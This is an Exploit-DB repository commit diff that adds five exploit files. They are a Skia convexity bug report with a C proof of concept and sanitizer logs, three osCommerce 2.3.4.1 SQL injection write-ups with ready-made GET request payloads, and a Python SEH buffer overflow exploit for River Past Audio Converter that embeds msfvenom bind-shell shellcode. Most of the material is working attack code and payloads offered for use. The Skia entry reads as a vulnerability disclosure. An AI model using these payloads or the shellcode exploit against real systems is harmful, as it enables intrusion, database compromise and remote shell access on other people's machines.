DB: 2019-02-07
5 changes to exploits/shellcodes Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows River Past Audio Converter 7.7.16 - Buffer Overflow (SEH) osCommerce 2.3.4.1 - 'currency' SQL Injection osCommerce 2.3.4.1 - 'products_id' SQL Injection osCommerce 2.3.4.1 - 'reviews_id' SQL Injection
This commit is contained in:
parent
d667cf901c
commit
e965ded980
6 changed files with 408 additions and 0 deletions
225
exploits/multiple/dos/46332.txt
Normal file
225
exploits/multiple/dos/46332.txt
Normal file
|
@ -0,0 +1,225 @@
|
|||
I was looking into the root cause of https://bugs.chromium.org/p/chromium/issues/detail?id=850350. In that bug, due to precision errors, Skia generated a concave RRect, but declared it convex. Later, the RRect was transformed with an affine transform and used as a clipping region for drawing. Because the convex path filling algorithm was used while the path was actually concave, this broke some assumptions and led to a stack out-of-bounds write.
|
||||
|
||||
The bug was fixed by addressing the precision errors in RRect generation. However, there is another subtle issue:
|
||||
|
||||
If Skia ever declares a path convex, the convexity attribute is going to survive affine transforms. Normally, in geometry, transforming a convex path with an affine transform is always going to result in a convex path. However, in Skia, due to precision limitations, that assumption might be incorrect because:
|
||||
|
||||
a) Due to precision errors, Skia may declare a polygon with tiny concavities to be convex. Using an affine transform, the concavities can then be rotated and enlarged.
|
||||
b) It might be possible, that due to precision errors, applying an affine transform on a convex path might result in tiny concavities that can be blown up by subsequent transformations.
|
||||
|
||||
There are possible multiple places where using a concave polygon with incorrect convexity attribute might lead to problems. The one I used in the PoC is the same as in https://bugs.chromium.org/p/chromium/issues/detail?id=850350. What happens there is walk_convex_edges() being used on a concave path:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?l=213&rcl=61c5108108acaeb4ee7fc8cb97c41f4f97d99040
|
||||
This leads to breaking another Skia assumption - that the image is always going to be rendered in the top-to-bottom, left-to-right order.
|
||||
If the path is used as a clipping region, this leads to incorrect ordering of runs in SkRgnBuilder. When the correspoding SkRgnClipBlitter is used, the "left < right" assumption gets broken here
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkBlitter.cpp?l=612&rcl=b2a232fb20358ccd6c7c2fafb7e83e444e4e2458
|
||||
which results in calling SkAlphaRuns::Break with the negative "count" argument, which leads to out-of-bounds write here:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154
|
||||
|
||||
The following Skia program demonstrates the issue:
|
||||
|
||||
=================================================================
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
#include "SkCanvas.h"
|
||||
#include "SkPath.h"
|
||||
#include "SkBitmap.h"
|
||||
#include "SkRegion.h"
|
||||
|
||||
int main(int argc, char * const argv[]) {
|
||||
|
||||
SkBitmap bitmap;
|
||||
bitmap.allocN32Pixels(24, 24);
|
||||
SkCanvas canvas(bitmap);
|
||||
|
||||
SkPaint paint;
|
||||
paint.setAntiAlias(true);
|
||||
paint.setStyle(SkPaint::kFill_Style);
|
||||
|
||||
// This is monotone in both x and y, but has a tiny concavity
|
||||
SkPath path;
|
||||
path.moveTo(-1,-1);
|
||||
path.lineTo(0, 0);
|
||||
path.lineTo(0, 0.5e-10);
|
||||
path.lineTo(0.1e-10, 1.1e-10);
|
||||
path.lineTo(1.5e-10, 1.1e-10);
|
||||
path.lineTo(1.5e-10, 2.5e-10);
|
||||
path.lineTo(0.9, 1);
|
||||
path.lineTo(-1, 1);
|
||||
path.close();
|
||||
|
||||
// If asked, Skia is going to declare it convex
|
||||
if(path.isConvex()) {
|
||||
printf("convex\n");
|
||||
} else {
|
||||
printf("not convex\n");
|
||||
}
|
||||
|
||||
// The convexity flag is going to survive all affine transforms
|
||||
// Even those that will enlarge the concavity and make the path
|
||||
// non-monotone.
|
||||
SkMatrix m;
|
||||
m.setRotate(-45);
|
||||
m.postScale(10e10, 10e10);
|
||||
m.postSkew(-1, 0);
|
||||
m.postTranslate(1, 10);
|
||||
path.transform(m);
|
||||
|
||||
// As demonstrated here
|
||||
if(path.isConvex()) {
|
||||
printf("convex\n");
|
||||
} else {
|
||||
printf("not convex\n");
|
||||
}
|
||||
|
||||
// We'll use the path as a clip region
|
||||
canvas.clipPath(path);
|
||||
|
||||
// And now we'll just draw a simple triangle.
|
||||
SkPath path2;
|
||||
path2.moveTo(15.5, 15);
|
||||
path2.lineTo(50.5, 50);
|
||||
path2.lineTo(-19.5, 50);
|
||||
path2.close();
|
||||
canvas.drawPath(path2, paint);
|
||||
|
||||
printf("done\n");
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
=================================================================
|
||||
|
||||
ASan log:
|
||||
|
||||
=================================================================
|
||||
==139872==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc5c8950d4 at pc 0x00000135512e bp 0x7ffc5c894f30 sp 0x7ffc5c894f28
|
||||
WRITE of size 1 at 0x7ffc5c8950d4 thread T0
|
||||
#0 0x135512d in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26
|
||||
#1 0x135512d in SkRgnClipBlitter::blitAntiH(int, int, unsigned char const*, short const*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.cpp:615
|
||||
#2 0xac437f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:96:15
|
||||
#3 0x1465fa4 in blit_trapezoid_row(AdditiveBlitter*, int, int, int, int, int, int, int, unsigned char, unsigned char*, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp
|
||||
#4 0x1465fa4 in aaa_walk_convex_edges(SkAnalyticEdge*, AdditiveBlitter*, int, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1187
|
||||
#5 0x1465fa4 in aaa_fill_path(SkPath const&, SkIRect const&, AdditiveBlitter*, int, int, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1669
|
||||
#6 0x1465fa4 in SkScan::AAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1713
|
||||
#7 0xad5687 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:844:9
|
||||
#8 0xad6cf6 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:883:9
|
||||
#9 0x9c5902 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1018:5
|
||||
#10 0x9c64b9 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1101:11
|
||||
#11 0x13478f3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.h:56:15
|
||||
#12 0x13478f3 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBitmapDevice.cpp:407
|
||||
#13 0x98e9ce in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:2141:23
|
||||
#14 0x983f71 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:1694:11
|
||||
#15 0x69add0 in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../example/SkiaSDLExample.cpp:63:10
|
||||
#16 0x7ff1044112b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
|
||||
#17 0x5ab0e9 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/SkiaSDLExample+0x5ab0e9)
|
||||
|
||||
Address 0x7ffc5c8950d4 is located in stack of thread T0 at offset 52 in frame
|
||||
#0 0xac421f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:87
|
||||
|
||||
This frame has 2 object(s):
|
||||
[32, 38) 'runs'
|
||||
[64, 66) 'aa' <== Memory access at offset 52 underflows this variable
|
||||
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
|
||||
(longjmp and C++ exceptions *are* supported)
|
||||
SUMMARY: AddressSanitizer: stack-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26 in SkAlphaRuns::Break(short*, unsigned char*, int, int)
|
||||
Shadow bytes around the buggy address:
|
||||
0x10000b90a9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90a9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90a9e0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f2
|
||||
0x10000b90a9f0: f2 f2 f2 f2 04 f2 04 f3 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
=>0x10000b90aa10: 00 00 00 00 f1 f1 f1 f1 06 f2[f2]f2 02 f3 f3 f3
|
||||
0x10000b90aa20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa30: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==139872==ABORTING
|
||||
|
||||
################################################################################
|
||||
|
||||
Another variant of this issue can be triggered while rendering a concave path with SkScan::SAAFillPath algorithm.
|
||||
|
||||
When drawing a path with SkScan::SAAFillPath, if the path is concave but Skia thinks it's convex, this can lead to SuperBlitter::blitH without respecting the the top-to-bottom, left-to-right order. In this case, this leads to SkAlphaRuns::add also being called out-of-order, which leads to SkAlphaRuns::Break being called with a negative "x" argument, which leads to uninitialized memory being read here:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&l=150&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c
|
||||
Which then leads to out-of-bounds reads/writes on the following lines:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=155
|
||||
|
||||
This issue is also triggerable in Chrome by simply drawing a path to the canvas.
|
||||
|
||||
Skia and Chrome PoCs are attached.
|
||||
|
||||
|
||||
MSan log from Skia:
|
||||
|
||||
==55058==WARNING: MemorySanitizer: use-of-uninitialized-value
|
||||
#0 0xcb9188 in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:155:17
|
||||
#1 0xcb9188 in SkAlphaRuns::add(int, unsigned int, int, unsigned int, unsigned int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:83
|
||||
#2 0xcb9188 in SuperBlitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:251
|
||||
#3 0xce2e0e in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:278:30
|
||||
#4 0xce0b79 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:488:9
|
||||
#5 0xcbc6f3 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:737:9
|
||||
#6 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9
|
||||
#7 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5
|
||||
#8 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11
|
||||
#9 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15
|
||||
#10 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407
|
||||
#11 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23
|
||||
#12 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11
|
||||
#13 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10
|
||||
#14 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
|
||||
#15 0x5af729 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5af729)
|
||||
|
||||
Uninitialized value was created by a heap allocation
|
||||
#0 0x5b799c in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5b799c)
|
||||
#1 0xdb06dd in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/ports/SkMemory_malloc.cpp:71:13
|
||||
#2 0xb0b9c7 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../include/private/SkMalloc.h:59:12
|
||||
#3 0xb0b9c7 in SkAutoMalloc::reset(unsigned long, SkAutoMalloc::OnShrink) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAutoMalloc.h:53
|
||||
#4 0xb0b9c7 in SkBlitter::allocBlitMemory(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBlitter.h:137
|
||||
#5 0xcb6c9d in SuperBlitter::SuperBlitter(SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:159:32
|
||||
#6 0xcbc648 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:736:22
|
||||
#7 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9
|
||||
#8 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5
|
||||
#9 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11
|
||||
#10 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15
|
||||
#11 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407
|
||||
#12 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23
|
||||
#13 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11
|
||||
#14 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10
|
||||
#15 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
|
||||
|
||||
################################################################################
|
||||
|
||||
A third variant of this, which is also exploitable in Chrome (I just linked to the ClusterFuzz testcase) is when a path is rendered SkScan::SAAFillPath with a MaskSuperBlitter. In this case, rendering concave path as convex leads to "x" coordinate being increased beyond the image bounds, which leads to incrementing out-of-bounds data in
|
||||
https://skia.googlesource.com/skia/+/fa7df23d8b0c4121adfc5ad45c295e7077fad3f5/src/core/SkScan_AntiPath.cpp#483
|
||||
|
||||
Note: ptr normally points inside
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_AntiPath.cpp?type=cs&g=0&l=435&rcl=05caa69a3f5aa45fd230ec302e6da1522d993747
|
||||
which is (in this case) allocated on the stack, so this variant gives us a stack out-of-bounds increment by a chosen small value, which is a pretty nice exploitation primitive.
|
||||
|
||||
PoCs for Skia and Chrome are attached.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46332.zip
|
37
exploits/php/webapps/46328.txt
Normal file
37
exploits/php/webapps/46328.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
####################################################################
|
||||
|
||||
# Exploit Title: osCommerce 2.3.4.1 - 'currency' SQL Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 05-02-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://www.oscommerce.com
|
||||
# Software Link: https://www.oscommerce.com/Products
|
||||
# Version: 2.3.4.1
|
||||
# Category: Webapps
|
||||
# Tested on: Wampp @Win
|
||||
# CVE: N/A
|
||||
# Software Description: osCommerce Online Merchant is a complete online
|
||||
store solution
|
||||
that contains both a shop frontend and an administration backend
|
||||
which can be easily configured and customized with over 8,855 free
|
||||
add-ons.
|
||||
|
||||
####################################################################
|
||||
|
||||
# Vulnerabilities / Impact
|
||||
# This web application called as osCommerce 2.3.4.1 version.
|
||||
# Switch to the shopping_cart tab. Replace the ID value in the url, with a
|
||||
high number value.
|
||||
for example shopping_cart.php?currency=1 change to 9999999
|
||||
then add the payload at Attack_pattern to the end of the url.
|
||||
|
||||
####################################################################
|
||||
|
||||
# POC - SQL (Boolean Based)
|
||||
# Parameters : currency
|
||||
# Attack Pattern : %27 oR 3620772=3620772 aNd %276199%27=%276199
|
||||
# GET Request :
|
||||
http://localhost/oscommerce/catalog/shopping_cart.php?currency=99999999%27
|
||||
oR 3620772=3620772 aNd %276199%27=%276199
|
||||
|
||||
####################################################################
|
37
exploits/php/webapps/46329.txt
Normal file
37
exploits/php/webapps/46329.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
####################################################################
|
||||
|
||||
# Exploit Title: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 05-02-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://www.oscommerce.com
|
||||
# Software Link: https://www.oscommerce.com/Products
|
||||
# Version: 2.3.4.1
|
||||
# Category: Webapps
|
||||
# Tested on: Wampp @Win
|
||||
# CVE: N/A
|
||||
# Software Description: osCommerce Online Merchant is a complete online
|
||||
store solution
|
||||
that contains both a shop frontend and an administration backend
|
||||
which can be easily configured and customized with over 8,855 free
|
||||
add-ons.
|
||||
|
||||
####################################################################
|
||||
|
||||
# Vulnerabilities / Impact
|
||||
# This web application called as osCommerce 2.3.4.1 version.
|
||||
# Switch to the product_info tab. Replace the ID value in the url, with a
|
||||
high number value.
|
||||
for example product_info.php?products_id=1 change to 9999999
|
||||
then add the payload at Attack_pattern to the end of the url.
|
||||
|
||||
####################################################################
|
||||
|
||||
# POC - SQL (Boolean Based)
|
||||
# Parameters : products_id
|
||||
# Attack Pattern : oR 1811160=1811160 aNd 7193=7193
|
||||
# GET Request :
|
||||
http://localhost/oscommerce/catalog/product_info.php?products_id=99999999
|
||||
oR 1811160=1811160 aNd 7193=7193
|
||||
|
||||
####################################################################
|
36
exploits/php/webapps/46330.txt
Normal file
36
exploits/php/webapps/46330.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
####################################################################
|
||||
|
||||
# Exploit Title: osCommerce 2.3.4.1 - 'reviews_id' SQL Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 05-02-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://www.oscommerce.com
|
||||
# Software Link: https://www.oscommerce.com/Products
|
||||
# Version: 2.3.4.1
|
||||
# Category: Webapps
|
||||
# Tested on: Wampp @Win
|
||||
# CVE: N/A
|
||||
# Software Description: osCommerce Online Merchant is a complete online
|
||||
store solution
|
||||
that contains both a shop frontend and an administration backend
|
||||
which can be easily configured and customized with over 8,855 free
|
||||
add-ons.
|
||||
|
||||
####################################################################
|
||||
|
||||
# Vulnerabilities / Impact
|
||||
# This web application called as osCommerce 2.3.4.1 version.
|
||||
# Switch to the product reviews tab. Replace the ID value in the url, with
|
||||
a high number value.
|
||||
for example reviews_id=2 change to 9999999
|
||||
then add the payload at Attack_pattern to the end of the url.
|
||||
|
||||
####################################################################
|
||||
|
||||
# POC - SQL (Boolean Based)
|
||||
# Parameters : reviews_id
|
||||
# Attack Pattern : /**/oR/**/7096077=7096077/**/aNd/**/7193=7193
|
||||
# GET Request :
|
||||
http://localhost/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193
|
||||
|
||||
####################################################################
|
68
exploits/windows/local/46331.py
Executable file
68
exploits/windows/local/46331.py
Executable file
|
@ -0,0 +1,68 @@
|
|||
# Exploit Title: River_Past_Audio_Converter - Buffer Overflow (SEH)
|
||||
# Date: 06.02.2019
|
||||
# Vendor Homepage: www.riverpast.com
|
||||
# Software Link: https://en.softonic.com/download/river-past-audio-converter/windows/post-download?sl=3D1
|
||||
# Exploit Author: Matteo Malvica
|
||||
# Tested Version: 7.7.16
|
||||
# Tested on: Windows 10 - 10.0.17134.1
|
||||
# Vulnerability Type: Local Buffer Overflow (SEH)
|
||||
#
|
||||
# Steps:
|
||||
# 1.- Run python code : River_Past_Audio_Converter.py
|
||||
# 2.- Open carbonara.txt and copy content to clipboard
|
||||
# 3.- Open River_PastAudio_Converter.exe and click on the 'Options' inside fhe 'File' menu.
|
||||
# 4.- Paste the content of carbonara.txt into the 'Lame_enc.dll' name field.
|
||||
# 5.- Click 'OK' and you will have a bind shell listening on port 4444.
|
||||
|
||||
import socket
|
||||
import struct
|
||||
|
||||
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -a x86 -b '\x00\x0d\x0a\x42' -f python
|
||||
shellcode = ""
|
||||
shellcode += "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
|
||||
shellcode += "\x76\x0e\xba\xfe\x4d\xcc\x83\xee\xfc\xe2\xf4\x46\x16"
|
||||
shellcode += "\xcf\xcc\xba\xfe\x2d\x45\x5f\xcf\x8d\xa8\x31\xae\x7d"
|
||||
shellcode += "\x47\xe8\xf2\xc6\x9e\xae\x75\x3f\xe4\xb5\x49\x07\xea"
|
||||
shellcode += "\x8b\x01\xe1\xf0\xdb\x82\x4f\xe0\x9a\x3f\x82\xc1\xbb"
|
||||
shellcode += "\x39\xaf\x3e\xe8\xa9\xc6\x9e\xaa\x75\x07\xf0\x31\xb2"
|
||||
shellcode += "\x5c\xb4\x59\xb6\x4c\x1d\xeb\x75\x14\xec\xbb\x2d\xc6"
|
||||
shellcode += "\x85\xa2\x1d\x77\x85\x31\xca\xc6\xcd\x6c\xcf\xb2\x60"
|
||||
shellcode += "\x7b\x31\x40\xcd\x7d\xc6\xad\xb9\x4c\xfd\x30\x34\x81"
|
||||
shellcode += "\x83\x69\xb9\x5e\xa6\xc6\x94\x9e\xff\x9e\xaa\x31\xf2"
|
||||
shellcode += "\x06\x47\xe2\xe2\x4c\x1f\x31\xfa\xc6\xcd\x6a\x77\x09"
|
||||
shellcode += "\xe8\x9e\xa5\x16\xad\xe3\xa4\x1c\x33\x5a\xa1\x12\x96"
|
||||
shellcode += "\x31\xec\xa6\x41\xe7\x96\x7e\xfe\xba\xfe\x25\xbb\xc9"
|
||||
shellcode += "\xcc\x12\x98\xd2\xb2\x3a\xea\xbd\x01\x98\x74\x2a\xff"
|
||||
shellcode += "\x4d\xcc\x93\x3a\x19\x9c\xd2\xd7\xcd\xa7\xba\x01\x98"
|
||||
shellcode += "\xa6\xb2\xa7\x1d\x2e\x47\xbe\x1d\x8c\xea\x96\xa7\xc3"
|
||||
shellcode += "\x65\x1e\xb2\x19\x2d\x96\x4f\xcc\xab\xa2\xc4\x2a\xd0"
|
||||
shellcode += "\xee\x1b\x9b\xd2\x3c\x96\xfb\xdd\x01\x98\x9b\xd2\x49"
|
||||
shellcode += "\xa4\xf4\x45\x01\x98\x9b\xd2\x8a\xa1\xf7\x5b\x01\x98"
|
||||
shellcode += "\x9b\x2d\x96\x38\xa2\xf7\x9f\xb2\x19\xd2\x9d\x20\xa8"
|
||||
shellcode += "\xba\x77\xae\x9b\xed\xa9\x7c\x3a\xd0\xec\x14\x9a\x58"
|
||||
shellcode += "\x03\x2b\x0b\xfe\xda\x71\xcd\xbb\x73\x09\xe8\xaa\x38"
|
||||
shellcode += "\x4d\x88\xee\xae\x1b\x9a\xec\xb8\x1b\x82\xec\xa8\x1e"
|
||||
shellcode += "\x9a\xd2\x87\x81\xf3\x3c\x01\x98\x45\x5a\xb0\x1b\x8a"
|
||||
shellcode += "\x45\xce\x25\xc4\x3d\xe3\x2d\x33\x6f\x45\xbd\x79\x18"
|
||||
shellcode += "\xa8\x25\x6a\x2f\x43\xd0\x33\x6f\xc2\x4b\xb0\xb0\x7e"
|
||||
shellcode += "\xb6\x2c\xcf\xfb\xf6\x8b\xa9\x8c\x22\xa6\xba\xad\xb2"
|
||||
shellcode += "\x19"
|
||||
|
||||
|
||||
padding="\x21"*280
|
||||
nseh = "\xEB\x12\x90\x90"
|
||||
seh = struct.pack('<L',0x10011977) # 10011977 # POP POP RET
|
||||
rest = "\x24" * (3000-len(padding)-len(shellcode)-4)
|
||||
nops = "\x90\x90\x90\x90"
|
||||
|
||||
payload = padding + nseh + seh + nops * 16 + shellcode + rest
|
||||
|
||||
try:
|
||||
f=open("carbonara.txt","w")
|
||||
print "[+] Creating %s bytes pasta payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] Carbonara created!"
|
||||
|
||||
except:
|
||||
print "Carbonara cannot be created"
|
|
@ -6298,6 +6298,7 @@ id,file,description,date,author,type,platform,port
|
|||
46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
|
||||
46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
|
||||
